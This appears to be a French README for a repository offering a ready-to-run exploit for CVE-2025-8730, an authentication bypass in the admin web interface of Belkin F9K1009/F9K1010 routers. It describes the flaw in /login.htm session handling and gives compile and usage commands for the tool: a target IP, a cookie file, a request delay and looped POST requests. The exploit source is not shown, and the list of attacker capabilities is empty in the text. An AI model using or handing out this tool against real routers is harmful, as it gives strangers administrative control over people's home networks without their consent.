
Exploit démontrant une vulnérabilité de contournement d'authentification dans l'interface web des routeurs Belkin F9K1009 et F9K1010.
Auteur : Byte Reaper
Ce dépôt contient un exploit pour CVE‑2025‑8730, une vulnérabilité critique de contournement d'authentification affectant l'interface web des routeurs Belkin F9K1009 et F9K1010.
La faille réside dans la logique de validation de session du fichier /login.htm, où des cookies mal gérés ou des requêtes forgées permettent à des attaquants de contourner les contrôles de connexion et d'obtenir un accès complet à l'interface d'administration sans identifiants valides.
Cette vulnérabilité permet à des attaquants distants (avec accès réseau) de :
Entrée NVD : https://nvd.nist.gov/vuln/detail/CVE-2025-8730
gcc exploit.c argparse.c -o CVE-2025-8730 -lcurl
./CVE-2025-8730 -i 192.168.1.1
Mode verbeux :
./CVE-2025-8730 -i 192.168.1.1 -v -c [fichier de cookies]
URL complète :
./CVE-2025-8730 -f http://<IP>/<FICHIER_LOGIN>
Délai (seconde) :
./CVE-2025-8730 -i 192.168.1.1 -s 1
Nombre de requêtes (boucle), exemple 10 requêtes POST :
./CVE-2025-8730 -i 192.168.1.1 -k 10 -s 1 -v
Licence :
Licence MIT